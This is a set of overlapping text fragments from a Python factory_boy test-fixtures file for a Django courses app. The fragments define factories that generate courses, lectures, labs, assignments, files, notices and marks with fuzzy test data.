"self.teachers.add(teacher) class LectureFactory(factory.django.DjangoModelFactory): class Meta: model = models.Lecture course = factory.SubFactory(CourseFactory) title =",
"{'width': 600, 'height': 600} ), 'example.jpg' ) ) created_at = fuzzy.FuzzyDate(datetime.date.today()) updated_at =",
"= random.choices(users_models.Teacher.objects.all(), k=5) for teacher in random_teachers: self.teachers.add(teacher) class LectureFactory(factory.django.DjangoModelFactory): class Meta: model",
"class Meta: model = models.Lecture course = factory.SubFactory(CourseFactory) title = fuzzy.FuzzyText(length=16) description =",
"datetime.timedelta(days=100), end_date=datetime.date.today() + datetime.timedelta(days=100), ) class GroupFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseGroup name",
"= factory.Faker('text') created_at = fuzzy.FuzzyDate(datetime.date.today()) class AssignmentFactory(factory.django.DjangoModelFactory): class Meta: model = models.Assignment laboratory",
"= factory.SubFactory(CourseFactory) name = fuzzy.FuzzyText(length=16) class CourseMarkFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseMark mark",
"teacher = factory.SubFactory(users_factories.TeacherFactory) class NoticeFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseNotice course = factory.SubFactory(CourseFactory)",
"models.CourseFile name = fuzzy.FuzzyText(length=16) description = factory.Faker('text') file = factory.LazyAttribute( lambda _: ContentFile(",
"self.students.add(student) class LabFactory(factory.django.DjangoModelFactory): class Meta: model = models.Laboratory course = factory.SubFactory(CourseFactory) group =",
"for teacher in random_teachers: self.teachers.add(teacher) class LectureFactory(factory.django.DjangoModelFactory): class Meta: model = models.Lecture course",
"factory.Faker('date_object') supervisor = factory.SubFactory(users_factories.StudentFactory) profile = fuzzy.FuzzyChoice(PROFILE_CHOICES) @factory.post_generation def students(self, create, extracted, **kwargs):",
"language = fuzzy.FuzzyChoice(LANGUAGE_CHOICES) lecture_hours = fuzzy.FuzzyChoice([i for i in range(1, 40)]) labs_hours =",
"extracted: self.teachers.add(teacher) else: random_teachers = random.choices(users_models.Teacher.objects.all(), k=5) for teacher in random_teachers: self.teachers.add(teacher) class",
"return if extracted: for student in extracted: self.students.add(student) class LabFactory(factory.django.DjangoModelFactory): class Meta: model",
"LabFactory(factory.django.DjangoModelFactory): class Meta: model = models.Laboratory course = factory.SubFactory(CourseFactory) group = factory.SubFactory(GroupFactory) title",
"= models.CourseMark mark = 65 date = fuzzy.FuzzyDate(datetime.date.today()) description = factory.Faker('text') course =",
"Meta: model = models.Assignment laboratory = factory.SubFactory(LabFactory) teacher = factory.SubFactory(users_factories.TeacherFactory) deadline = fuzzy.FuzzyDate(datetime.date.today())",
"teacher = factory.SubFactory(users_factories.TeacherFactory) deadline = fuzzy.FuzzyDate(datetime.date.today()) title = fuzzy.FuzzyText(length=16) content = factory.Faker('text') class",
"% n) start_year = factory.Faker('date_object') supervisor = factory.SubFactory(users_factories.StudentFactory) profile = fuzzy.FuzzyChoice(PROFILE_CHOICES) @factory.post_generation def",
"class Meta: model = models.Laboratory course = factory.SubFactory(CourseFactory) group = factory.SubFactory(GroupFactory) title =",
"extracted: for student in extracted: self.students.add(student) else: random_students = random.choices(users_models.Student.objects.all(), k=10) for student",
"for student in extracted: self.students.add(student) else: random_students = random.choices(users_models.Student.objects.all(), k=10) for student in",
"factory.Faker('text') date = fuzzy.FuzzyDate( start_date=datetime.date.today() - datetime.timedelta(days=100), end_date=datetime.date.today() + datetime.timedelta(days=100), ) class GroupFactory(factory.django.DjangoModelFactory):",
"self.students.add(student) else: random_students = random.choices(users_models.Student.objects.all(), k=10) for student in random_students: self.students.add(student) class CourseFactory(factory.django.DjangoModelFactory):",
"factory.SubFactory(CourseFactory) student = factory.SubFactory(users_factories.StudentFactory) teacher = factory.SubFactory(users_factories.TeacherFactory) class NoticeFactory(factory.django.DjangoModelFactory): class Meta: model =",
"factory.Faker('text') file = factory.LazyAttribute( lambda _: ContentFile( factory.django.ImageField()._make_data( {'width': 600, 'height': 600} ),",
"@factory.post_generation def students(self, create, extracted, **kwargs): if not create: return if extracted: for",
"not create: return if extracted: for teacher in extracted: self.teachers.add(teacher) else: random_teachers =",
"factory.Faker('text') course = factory.SubFactory(CourseFactory) student = factory.SubFactory(users_factories.StudentFactory) teacher = factory.SubFactory(users_factories.TeacherFactory) class NoticeFactory(factory.django.DjangoModelFactory): class",
"content = factory.Faker('text') class CourseFileFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseFile name = fuzzy.FuzzyText(length=16)",
"Meta: model = models.Laboratory course = factory.SubFactory(CourseFactory) group = factory.SubFactory(GroupFactory) title = fuzzy.FuzzyText(length=16)",
"class GradeFactory(factory.django.DjangoModelFactory): class Meta: model = models.Grade name = factory.Sequence(lambda n: \"Grade %03d\"",
"= fuzzy.FuzzyDate( start_date=datetime.date.today() - datetime.timedelta(days=100), end_date=datetime.date.today() + datetime.timedelta(days=100), ) class GroupFactory(factory.django.DjangoModelFactory): class Meta:",
"not create: return if extracted: for student in extracted: self.students.add(student) else: random_students =",
"= fuzzy.FuzzyChoice(PROFILE_CHOICES) @factory.post_generation def students(self, create, extracted, **kwargs): if not create: return if",
"**kwargs): if not create: return if extracted: for student in extracted: self.students.add(student) else:",
"def teachers(self, create, extracted, **kwargs): if not create: return if extracted: for teacher",
"date = fuzzy.FuzzyDate( start_date=datetime.date.today() - datetime.timedelta(days=100), end_date=datetime.date.today() + datetime.timedelta(days=100), ) class CourseGroupFactory(factory.django.DjangoModelFactory): class",
"% n) description = factory.Faker('text') head_teacher = factory.SubFactory(users_factories.TeacherFactory) grade = factory.SubFactory(GradeFactory) code_meu =",
"factory.SubFactory(CourseFactory) student = factory.SubFactory(users_factories.StudentFactory) teacher = factory.SubFactory(users_factories.TeacherFactory) class FinalCourseMarkFactory(factory.django.DjangoModelFactory): class Meta: model =",
"= factory.SubFactory(users_factories.TeacherFactory) class NoticeFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseNotice course = factory.SubFactory(CourseFactory) sender",
"= fuzzy.FuzzyText(length=16) @factory.post_generation def students(self, create, extracted, **kwargs): if not create: return if",
"fuzzy.FuzzyChoice([i for i in range(1, 40)]) labs_hours = fuzzy.FuzzyChoice([i for i in range(1,",
"n: \"Course %02d\" % n) description = factory.Faker('text') head_teacher = factory.SubFactory(users_factories.TeacherFactory) grade =",
"Meta: model = models.CourseNotice course = factory.SubFactory(CourseFactory) sender = factory.SubFactory(users_factories.TeacherFactory) title = fuzzy.FuzzyText(length=16)",
"code_meu = '123' has_exam = False semester = fuzzy.FuzzyChoice([i for i in range(1,",
"= factory.Sequence(lambda n: \"Grade %03d\" % n) start_year = factory.Faker('date_object') supervisor = factory.SubFactory(users_factories.StudentFactory)",
"= fuzzy.FuzzyChoice([i for i in range(1, 40)]) labs_hours = fuzzy.FuzzyChoice([i for i in",
"= [x[0] for x in PROFILE_CHOICES] LANGUAGE_CHOICES = [x[0] for x in LANGUAGE_CHOICES]",
"= factory.SubFactory(users_factories.TeacherFactory) class FinalCourseMarkFactory(factory.django.DjangoModelFactory): class Meta: model = models.FinalCourseMark mark = 5 date",
"class Meta: model = models.Course name = factory.Sequence(lambda n: \"Course %02d\" % n)",
"student in extracted: self.students.add(student) class LabFactory(factory.django.DjangoModelFactory): class Meta: model = models.Laboratory course =",
"model = models.Laboratory course = factory.SubFactory(CourseFactory) group = factory.SubFactory(GroupFactory) title = fuzzy.FuzzyText(length=16) description",
"django.core.files.base import ContentFile from courses import models from courses.models import LANGUAGE_CHOICES, PROFILE_CHOICES from",
"in LANGUAGE_CHOICES] class GradeFactory(factory.django.DjangoModelFactory): class Meta: model = models.Grade name = factory.Sequence(lambda n:",
"class Meta: model = models.Grade name = factory.Sequence(lambda n: \"Grade %03d\" % n)",
"users_factories from users import models as users_models PROFILE_CHOICES = [x[0] for x in",
"factory.Faker('text') created_at = fuzzy.FuzzyDate(datetime.date.today()) class AssignmentFactory(factory.django.DjangoModelFactory): class Meta: model = models.Assignment laboratory =",
"student in extracted: self.students.add(student) else: random_students = random.choices(users_models.Student.objects.all(), k=10) for student in random_students:",
"= factory.SubFactory(LabFactory) teacher = factory.SubFactory(users_factories.TeacherFactory) deadline = fuzzy.FuzzyDate(datetime.date.today()) title = fuzzy.FuzzyText(length=16) content =",
"extracted, **kwargs): if not create: return if extracted: for student in extracted: self.students.add(student)",
"= factory.SubFactory(GroupFactory) title = fuzzy.FuzzyText(length=16) description = factory.Faker('text') date = fuzzy.FuzzyDate( start_date=datetime.date.today() -",
"factory.SubFactory(users_factories.StudentFactory) profile = fuzzy.FuzzyChoice(PROFILE_CHOICES) @factory.post_generation def students(self, create, extracted, **kwargs): if not create:",
"extracted, **kwargs): if not create: return if extracted: for teacher in extracted: self.teachers.add(teacher)",
"class LectureFactory(factory.django.DjangoModelFactory): class Meta: model = models.Lecture course = factory.SubFactory(CourseFactory) title = fuzzy.FuzzyText(length=16)",
"for i in range(1, 40)]) labs_hours = fuzzy.FuzzyChoice([i for i in range(1, 40)])",
"= factory.SubFactory(users_factories.StudentFactory) teacher = factory.SubFactory(users_factories.TeacherFactory) class NoticeFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseNotice course",
"for student in extracted: self.students.add(student) class LabFactory(factory.django.DjangoModelFactory): class Meta: model = models.Laboratory course",
"model = models.Grade name = factory.Sequence(lambda n: \"Grade %03d\" % n) start_year =",
"random import factory import factory.fuzzy as fuzzy from django.core.files.base import ContentFile from courses",
"class Meta: model = models.CourseGroup name = fuzzy.FuzzyText(length=16) @factory.post_generation def students(self, create, extracted,",
"models.Grade name = factory.Sequence(lambda n: \"Grade %03d\" % n) start_year = factory.Faker('date_object') supervisor",
"from courses import models from courses.models import LANGUAGE_CHOICES, PROFILE_CHOICES from tests.users import factories",
"name = fuzzy.FuzzyText(length=16) description = factory.Faker('text') file = factory.LazyAttribute( lambda _: ContentFile( factory.django.ImageField()._make_data(",
"not create: return if extracted: for student in extracted: self.students.add(student) class LabFactory(factory.django.DjangoModelFactory): class",
"models.Assignment laboratory = factory.SubFactory(LabFactory) teacher = factory.SubFactory(users_factories.TeacherFactory) deadline = fuzzy.FuzzyDate(datetime.date.today()) title = fuzzy.FuzzyText(length=16)",
"else: random_teachers = random.choices(users_models.Teacher.objects.all(), k=5) for teacher in random_teachers: self.teachers.add(teacher) class LectureFactory(factory.django.DjangoModelFactory): class",
"end_date=datetime.date.today() + datetime.timedelta(days=100), ) class GroupFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseGroup name =",
"random_students: self.students.add(student) class CourseFactory(factory.django.DjangoModelFactory): class Meta: model = models.Course name = factory.Sequence(lambda n:",
"random_teachers = random.choices(users_models.Teacher.objects.all(), k=5) for teacher in random_teachers: self.teachers.add(teacher) class LectureFactory(factory.django.DjangoModelFactory): class Meta:",
"= fuzzy.FuzzyChoice([i for i in range(1, 40)]) @factory.post_generation def teachers(self, create, extracted, **kwargs):",
"Meta: model = models.CourseFile name = fuzzy.FuzzyText(length=16) description = factory.Faker('text') file = factory.LazyAttribute(",
"lecture_hours = fuzzy.FuzzyChoice([i for i in range(1, 40)]) labs_hours = fuzzy.FuzzyChoice([i for i",
"FinalCourseMarkFactory(factory.django.DjangoModelFactory): class Meta: model = models.FinalCourseMark mark = 5 date = fuzzy.FuzzyDate(datetime.date.today()) description",
"supervisor = factory.SubFactory(users_factories.StudentFactory) profile = fuzzy.FuzzyChoice(PROFILE_CHOICES) @factory.post_generation def students(self, create, extracted, **kwargs): if",
"import models from courses.models import LANGUAGE_CHOICES, PROFILE_CHOICES from tests.users import factories as users_factories",
"users_models PROFILE_CHOICES = [x[0] for x in PROFILE_CHOICES] LANGUAGE_CHOICES = [x[0] for x",
"import factory.fuzzy as fuzzy from django.core.files.base import ContentFile from courses import models from",
"class AssignmentFactory(factory.django.DjangoModelFactory): class Meta: model = models.Assignment laboratory = factory.SubFactory(LabFactory) teacher = factory.SubFactory(users_factories.TeacherFactory)",
"course = factory.SubFactory(CourseFactory) student = factory.SubFactory(users_factories.StudentFactory) teacher = factory.SubFactory(users_factories.TeacherFactory) class FinalCourseMarkFactory(factory.django.DjangoModelFactory): class Meta:",
"factory.SubFactory(GradeFactory) code_meu = '123' has_exam = False semester = fuzzy.FuzzyChoice([i for i in",
"factory.SubFactory(users_factories.TeacherFactory) class NoticeFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseNotice course = factory.SubFactory(CourseFactory) sender =",
"40)]) labs_hours = fuzzy.FuzzyChoice([i for i in range(1, 40)]) @factory.post_generation def teachers(self, create,",
"= factory.SubFactory(users_factories.TeacherFactory) title = fuzzy.FuzzyText(length=16) content = factory.Faker('text') created_at = fuzzy.FuzzyDate(datetime.date.today()) class AssignmentFactory(factory.django.DjangoModelFactory):",
"class Meta: model = models.CourseFile name = fuzzy.FuzzyText(length=16) description = factory.Faker('text') file =",
"- datetime.timedelta(days=100), end_date=datetime.date.today() + datetime.timedelta(days=100), ) class GroupFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseGroup",
"LANGUAGE_CHOICES] class GradeFactory(factory.django.DjangoModelFactory): class Meta: model = models.Grade name = factory.Sequence(lambda n: \"Grade",
"if not create: return if extracted: for student in extracted: self.students.add(student) class LabFactory(factory.django.DjangoModelFactory):",
"AssignmentFactory(factory.django.DjangoModelFactory): class Meta: model = models.Assignment laboratory = factory.SubFactory(LabFactory) teacher = factory.SubFactory(users_factories.TeacherFactory) deadline",
"date = fuzzy.FuzzyDate(datetime.date.today()) description = factory.Faker('text') course = factory.SubFactory(CourseFactory) student = factory.SubFactory(users_factories.StudentFactory) teacher",
"name = fuzzy.FuzzyText(length=16) class CourseMarkFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseMark mark = 65",
"class Meta: model = models.CourseMark mark = 65 date = fuzzy.FuzzyDate(datetime.date.today()) description =",
"course = factory.SubFactory(CourseFactory) name = fuzzy.FuzzyText(length=16) class CourseMarkFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseMark",
"factory.django.ImageField()._make_data( {'width': 600, 'height': 600} ), 'example.jpg' ) ) created_at = fuzzy.FuzzyDate(datetime.date.today()) updated_at",
"start_date=datetime.date.today() - datetime.timedelta(days=100), end_date=datetime.date.today() + datetime.timedelta(days=100), ) class CourseGroupFactory(factory.django.DjangoModelFactory): class Meta: model =",
"title = fuzzy.FuzzyText(length=16) content = factory.Faker('text') class CourseFileFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseFile",
"Meta: model = models.CourseGroup name = fuzzy.FuzzyText(length=16) @factory.post_generation def students(self, create, extracted, **kwargs):",
"= models.CourseGroup name = fuzzy.FuzzyText(length=16) @factory.post_generation def students(self, create, extracted, **kwargs): if not",
"40)]) @factory.post_generation def teachers(self, create, extracted, **kwargs): if not create: return if extracted:",
"model = models.Assignment laboratory = factory.SubFactory(LabFactory) teacher = factory.SubFactory(users_factories.TeacherFactory) deadline = fuzzy.FuzzyDate(datetime.date.today()) title",
"\"Grade %03d\" % n) start_year = factory.Faker('date_object') supervisor = factory.SubFactory(users_factories.StudentFactory) profile = fuzzy.FuzzyChoice(PROFILE_CHOICES)",
"fuzzy.FuzzyDate( start_date=datetime.date.today() - datetime.timedelta(days=100), end_date=datetime.date.today() + datetime.timedelta(days=100), ) class CourseGroupFactory(factory.django.DjangoModelFactory): class Meta: model",
"i in range(1, 40)]) @factory.post_generation def teachers(self, create, extracted, **kwargs): if not create:",
"= models.Laboratory course = factory.SubFactory(CourseFactory) group = factory.SubFactory(GroupFactory) title = fuzzy.FuzzyText(length=16) description =",
"file = factory.LazyAttribute( lambda _: ContentFile( factory.django.ImageField()._make_data( {'width': 600, 'height': 600} ), 'example.jpg'",
"65 date = fuzzy.FuzzyDate(datetime.date.today()) description = factory.Faker('text') course = factory.SubFactory(CourseFactory) student = factory.SubFactory(users_factories.StudentFactory)",
"model = models.CourseGroup course = factory.SubFactory(CourseFactory) name = fuzzy.FuzzyText(length=16) class CourseMarkFactory(factory.django.DjangoModelFactory): class Meta:",
"fuzzy.FuzzyDate( start_date=datetime.date.today() - datetime.timedelta(days=100), end_date=datetime.date.today() + datetime.timedelta(days=100), ) class GroupFactory(factory.django.DjangoModelFactory): class Meta: model",
"tests.users import factories as users_factories from users import models as users_models PROFILE_CHOICES =",
"= factory.Faker('date_object') supervisor = factory.SubFactory(users_factories.StudentFactory) profile = fuzzy.FuzzyChoice(PROFILE_CHOICES) @factory.post_generation def students(self, create, extracted,",
"factory.Faker('text') class CourseFileFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseFile name = fuzzy.FuzzyText(length=16) description =",
"factories as users_factories from users import models as users_models PROFILE_CHOICES = [x[0] for",
"students(self, create, extracted, **kwargs): if not create: return if extracted: for student in",
"class Meta: model = models.FinalCourseMark mark = 5 date = fuzzy.FuzzyDate(datetime.date.today()) description =",
"factory.SubFactory(users_factories.TeacherFactory) class FinalCourseMarkFactory(factory.django.DjangoModelFactory): class Meta: model = models.FinalCourseMark mark = 5 date =",
"in extracted: self.students.add(student) class LabFactory(factory.django.DjangoModelFactory): class Meta: model = models.Laboratory course = factory.SubFactory(CourseFactory)",
"PROFILE_CHOICES] LANGUAGE_CHOICES = [x[0] for x in LANGUAGE_CHOICES] class GradeFactory(factory.django.DjangoModelFactory): class Meta: model",
"import ContentFile from courses import models from courses.models import LANGUAGE_CHOICES, PROFILE_CHOICES from tests.users",
"CourseGroupFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseGroup course = factory.SubFactory(CourseFactory) name = fuzzy.FuzzyText(length=16) class",
"in range(1, 40)]) @factory.post_generation def teachers(self, create, extracted, **kwargs): if not create: return",
"= fuzzy.FuzzyText(length=16) class CourseMarkFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseMark mark = 65 date",
"create: return if extracted: for student in extracted: self.students.add(student) else: random_students = random.choices(users_models.Student.objects.all(),",
"= factory.LazyAttribute( lambda _: ContentFile( factory.django.ImageField()._make_data( {'width': 600, 'height': 600} ), 'example.jpg' )",
"i in range(1, 40)]) labs_hours = fuzzy.FuzzyChoice([i for i in range(1, 40)]) @factory.post_generation",
"k=5) for teacher in random_teachers: self.teachers.add(teacher) class LectureFactory(factory.django.DjangoModelFactory): class Meta: model = models.Lecture",
"models.CourseNotice course = factory.SubFactory(CourseFactory) sender = factory.SubFactory(users_factories.TeacherFactory) title = fuzzy.FuzzyText(length=16) content = factory.Faker('text')",
"has_exam = False semester = fuzzy.FuzzyChoice([i for i in range(1, 8)]) language =",
"PROFILE_CHOICES from tests.users import factories as users_factories from users import models as users_models",
"teacher = factory.SubFactory(users_factories.TeacherFactory) class FinalCourseMarkFactory(factory.django.DjangoModelFactory): class Meta: model = models.FinalCourseMark mark = 5",
"'123' has_exam = False semester = fuzzy.FuzzyChoice([i for i in range(1, 8)]) language",
"factory.Faker('text') head_teacher = factory.SubFactory(users_factories.TeacherFactory) grade = factory.SubFactory(GradeFactory) code_meu = '123' has_exam = False",
"fuzzy.FuzzyChoice(LANGUAGE_CHOICES) lecture_hours = fuzzy.FuzzyChoice([i for i in range(1, 40)]) labs_hours = fuzzy.FuzzyChoice([i for",
"CourseMarkFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseMark mark = 65 date = fuzzy.FuzzyDate(datetime.date.today()) description",
"import factory import factory.fuzzy as fuzzy from django.core.files.base import ContentFile from courses import",
"for x in LANGUAGE_CHOICES] class GradeFactory(factory.django.DjangoModelFactory): class Meta: model = models.Grade name =",
"= fuzzy.FuzzyText(length=16) description = factory.Faker('text') file = factory.LazyAttribute( lambda _: ContentFile( factory.django.ImageField()._make_data( {'width':",
"fuzzy.FuzzyChoice(PROFILE_CHOICES) @factory.post_generation def students(self, create, extracted, **kwargs): if not create: return if extracted:",
"%03d\" % n) start_year = factory.Faker('date_object') supervisor = factory.SubFactory(users_factories.StudentFactory) profile = fuzzy.FuzzyChoice(PROFILE_CHOICES) @factory.post_generation",
"student = factory.SubFactory(users_factories.StudentFactory) teacher = factory.SubFactory(users_factories.TeacherFactory) class NoticeFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseNotice",
"course = factory.SubFactory(CourseFactory) sender = factory.SubFactory(users_factories.TeacherFactory) title = fuzzy.FuzzyText(length=16) content = factory.Faker('text') created_at",
"fuzzy.FuzzyDate(datetime.date.today()) description = factory.Faker('text') course = factory.SubFactory(CourseFactory) student = factory.SubFactory(users_factories.StudentFactory) teacher = factory.SubFactory(users_factories.TeacherFactory)",
"= fuzzy.FuzzyDate(datetime.date.today()) description = factory.Faker('text') course = factory.SubFactory(CourseFactory) student = factory.SubFactory(users_factories.StudentFactory) teacher =",
"factory.SubFactory(users_factories.StudentFactory) teacher = factory.SubFactory(users_factories.TeacherFactory) class NoticeFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseNotice course =",
"= factory.Faker('text') course = factory.SubFactory(CourseFactory) student = factory.SubFactory(users_factories.StudentFactory) teacher = factory.SubFactory(users_factories.TeacherFactory) class FinalCourseMarkFactory(factory.django.DjangoModelFactory):",
"self.students.add(student) class CourseFactory(factory.django.DjangoModelFactory): class Meta: model = models.Course name = factory.Sequence(lambda n: \"Course",
"models.CourseMark mark = 65 date = fuzzy.FuzzyDate(datetime.date.today()) description = factory.Faker('text') course = factory.SubFactory(CourseFactory)",
"factory.LazyAttribute( lambda _: ContentFile( factory.django.ImageField()._make_data( {'width': 600, 'height': 600} ), 'example.jpg' ) )",
"[x[0] for x in PROFILE_CHOICES] LANGUAGE_CHOICES = [x[0] for x in LANGUAGE_CHOICES] class",
"= fuzzy.FuzzyChoice([i for i in range(1, 8)]) language = fuzzy.FuzzyChoice(LANGUAGE_CHOICES) lecture_hours = fuzzy.FuzzyChoice([i",
"factory.fuzzy as fuzzy from django.core.files.base import ContentFile from courses import models from courses.models",
"fuzzy.FuzzyText(length=16) class CourseMarkFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseMark mark = 65 date =",
"LANGUAGE_CHOICES = [x[0] for x in LANGUAGE_CHOICES] class GradeFactory(factory.django.DjangoModelFactory): class Meta: model =",
"create: return if extracted: for student in extracted: self.students.add(student) class LabFactory(factory.django.DjangoModelFactory): class Meta:",
"= fuzzy.FuzzyDate(datetime.date.today()) title = fuzzy.FuzzyText(length=16) content = factory.Faker('text') class CourseFileFactory(factory.django.DjangoModelFactory): class Meta: model",
"laboratory = factory.SubFactory(LabFactory) teacher = factory.SubFactory(users_factories.TeacherFactory) deadline = fuzzy.FuzzyDate(datetime.date.today()) title = fuzzy.FuzzyText(length=16) content",
"models.CourseGroup course = factory.SubFactory(CourseFactory) name = fuzzy.FuzzyText(length=16) class CourseMarkFactory(factory.django.DjangoModelFactory): class Meta: model =",
"create, extracted, **kwargs): if not create: return if extracted: for student in extracted:",
"teacher in extracted: self.teachers.add(teacher) else: random_teachers = random.choices(users_models.Teacher.objects.all(), k=5) for teacher in random_teachers:",
"if extracted: for student in extracted: self.students.add(student) class LabFactory(factory.django.DjangoModelFactory): class Meta: model =",
"= models.Course name = factory.Sequence(lambda n: \"Course %02d\" % n) description = factory.Faker('text')",
"NoticeFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseNotice course = factory.SubFactory(CourseFactory) sender = factory.SubFactory(users_factories.TeacherFactory) title",
"factory.SubFactory(users_factories.StudentFactory) teacher = factory.SubFactory(users_factories.TeacherFactory) class FinalCourseMarkFactory(factory.django.DjangoModelFactory): class Meta: model = models.FinalCourseMark mark =",
"grade = factory.SubFactory(GradeFactory) code_meu = '123' has_exam = False semester = fuzzy.FuzzyChoice([i for",
"create: return if extracted: for teacher in extracted: self.teachers.add(teacher) else: random_teachers = random.choices(users_models.Teacher.objects.all(),",
"self.teachers.add(teacher) else: random_teachers = random.choices(users_models.Teacher.objects.all(), k=5) for teacher in random_teachers: self.teachers.add(teacher) class LectureFactory(factory.django.DjangoModelFactory):",
"datetime.timedelta(days=100), end_date=datetime.date.today() + datetime.timedelta(days=100), ) class CourseGroupFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseGroup course",
"CourseFileFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseFile name = fuzzy.FuzzyText(length=16) description = factory.Faker('text') file",
"factory import factory.fuzzy as fuzzy from django.core.files.base import ContentFile from courses import models",
"Meta: model = models.Course name = factory.Sequence(lambda n: \"Course %02d\" % n) description",
"k=10) for student in random_students: self.students.add(student) class CourseFactory(factory.django.DjangoModelFactory): class Meta: model = models.Course",
"import LANGUAGE_CHOICES, PROFILE_CHOICES from tests.users import factories as users_factories from users import models",
"= 5 date = fuzzy.FuzzyDate(datetime.date.today()) description = factory.Faker('text') course = factory.SubFactory(CourseFactory) student =",
"model = models.CourseFile name = fuzzy.FuzzyText(length=16) description = factory.Faker('text') file = factory.LazyAttribute( lambda",
"= factory.SubFactory(GradeFactory) code_meu = '123' has_exam = False semester = fuzzy.FuzzyChoice([i for i",
"model = models.Lecture course = factory.SubFactory(CourseFactory) title = fuzzy.FuzzyText(length=16) description = factory.Faker('text') date",
"Meta: model = models.CourseGroup course = factory.SubFactory(CourseFactory) name = fuzzy.FuzzyText(length=16) class CourseMarkFactory(factory.django.DjangoModelFactory): class",
"5 date = fuzzy.FuzzyDate(datetime.date.today()) description = factory.Faker('text') course = factory.SubFactory(CourseFactory) student = factory.SubFactory(users_factories.StudentFactory)",
"range(1, 40)]) @factory.post_generation def teachers(self, create, extracted, **kwargs): if not create: return if",
"models as users_models PROFILE_CHOICES = [x[0] for x in PROFILE_CHOICES] LANGUAGE_CHOICES = [x[0]",
"fuzzy.FuzzyChoice([i for i in range(1, 8)]) language = fuzzy.FuzzyChoice(LANGUAGE_CHOICES) lecture_hours = fuzzy.FuzzyChoice([i for",
"courses.models import LANGUAGE_CHOICES, PROFILE_CHOICES from tests.users import factories as users_factories from users import",
"in PROFILE_CHOICES] LANGUAGE_CHOICES = [x[0] for x in LANGUAGE_CHOICES] class GradeFactory(factory.django.DjangoModelFactory): class Meta:",
"course = factory.SubFactory(CourseFactory) title = fuzzy.FuzzyText(length=16) description = factory.Faker('text') date = fuzzy.FuzzyDate( start_date=datetime.date.today()",
"models.Laboratory course = factory.SubFactory(CourseFactory) group = factory.SubFactory(GroupFactory) title = fuzzy.FuzzyText(length=16) description = factory.Faker('text')",
"factory.SubFactory(users_factories.TeacherFactory) deadline = fuzzy.FuzzyDate(datetime.date.today()) title = fuzzy.FuzzyText(length=16) content = factory.Faker('text') class CourseFileFactory(factory.django.DjangoModelFactory): class",
"LANGUAGE_CHOICES, PROFILE_CHOICES from tests.users import factories as users_factories from users import models as",
"as users_models PROFILE_CHOICES = [x[0] for x in PROFILE_CHOICES] LANGUAGE_CHOICES = [x[0] for",
"teachers(self, create, extracted, **kwargs): if not create: return if extracted: for teacher in",
"for x in PROFILE_CHOICES] LANGUAGE_CHOICES = [x[0] for x in LANGUAGE_CHOICES] class GradeFactory(factory.django.DjangoModelFactory):",
"models.Course name = factory.Sequence(lambda n: \"Course %02d\" % n) description = factory.Faker('text') head_teacher",
"random_teachers: self.teachers.add(teacher) class LectureFactory(factory.django.DjangoModelFactory): class Meta: model = models.Lecture course = factory.SubFactory(CourseFactory) title",
"name = fuzzy.FuzzyText(length=16) @factory.post_generation def students(self, create, extracted, **kwargs): if not create: return",
"class LabFactory(factory.django.DjangoModelFactory): class Meta: model = models.Laboratory course = factory.SubFactory(CourseFactory) group = factory.SubFactory(GroupFactory)",
"= models.CourseGroup course = factory.SubFactory(CourseFactory) name = fuzzy.FuzzyText(length=16) class CourseMarkFactory(factory.django.DjangoModelFactory): class Meta: model",
"in extracted: self.teachers.add(teacher) else: random_teachers = random.choices(users_models.Teacher.objects.all(), k=5) for teacher in random_teachers: self.teachers.add(teacher)",
"ContentFile from courses import models from courses.models import LANGUAGE_CHOICES, PROFILE_CHOICES from tests.users import",
"extracted: self.students.add(student) class LabFactory(factory.django.DjangoModelFactory): class Meta: model = models.Laboratory course = factory.SubFactory(CourseFactory) group",
"models from courses.models import LANGUAGE_CHOICES, PROFILE_CHOICES from tests.users import factories as users_factories from",
"= fuzzy.FuzzyText(length=16) content = factory.Faker('text') created_at = fuzzy.FuzzyDate(datetime.date.today()) class AssignmentFactory(factory.django.DjangoModelFactory): class Meta: model",
"fuzzy.FuzzyDate(datetime.date.today()) title = fuzzy.FuzzyText(length=16) content = factory.Faker('text') class CourseFileFactory(factory.django.DjangoModelFactory): class Meta: model =",
"mark = 65 date = fuzzy.FuzzyDate(datetime.date.today()) description = factory.Faker('text') course = factory.SubFactory(CourseFactory) student",
"= fuzzy.FuzzyText(length=16) description = factory.Faker('text') date = fuzzy.FuzzyDate( start_date=datetime.date.today() - datetime.timedelta(days=100), end_date=datetime.date.today() +",
"= factory.SubFactory(CourseFactory) title = fuzzy.FuzzyText(length=16) description = factory.Faker('text') date = fuzzy.FuzzyDate( start_date=datetime.date.today() -",
"n) start_year = factory.Faker('date_object') supervisor = factory.SubFactory(users_factories.StudentFactory) profile = fuzzy.FuzzyChoice(PROFILE_CHOICES) @factory.post_generation def students(self,",
"class Meta: model = models.CourseNotice course = factory.SubFactory(CourseFactory) sender = factory.SubFactory(users_factories.TeacherFactory) title =",
"semester = fuzzy.FuzzyChoice([i for i in range(1, 8)]) language = fuzzy.FuzzyChoice(LANGUAGE_CHOICES) lecture_hours =",
"student in random_students: self.students.add(student) class CourseFactory(factory.django.DjangoModelFactory): class Meta: model = models.Course name =",
"factory.SubFactory(users_factories.TeacherFactory) grade = factory.SubFactory(GradeFactory) code_meu = '123' has_exam = False semester = fuzzy.FuzzyChoice([i",
"**kwargs): if not create: return if extracted: for student in extracted: self.students.add(student) class",
"fuzzy from django.core.files.base import ContentFile from courses import models from courses.models import LANGUAGE_CHOICES,",
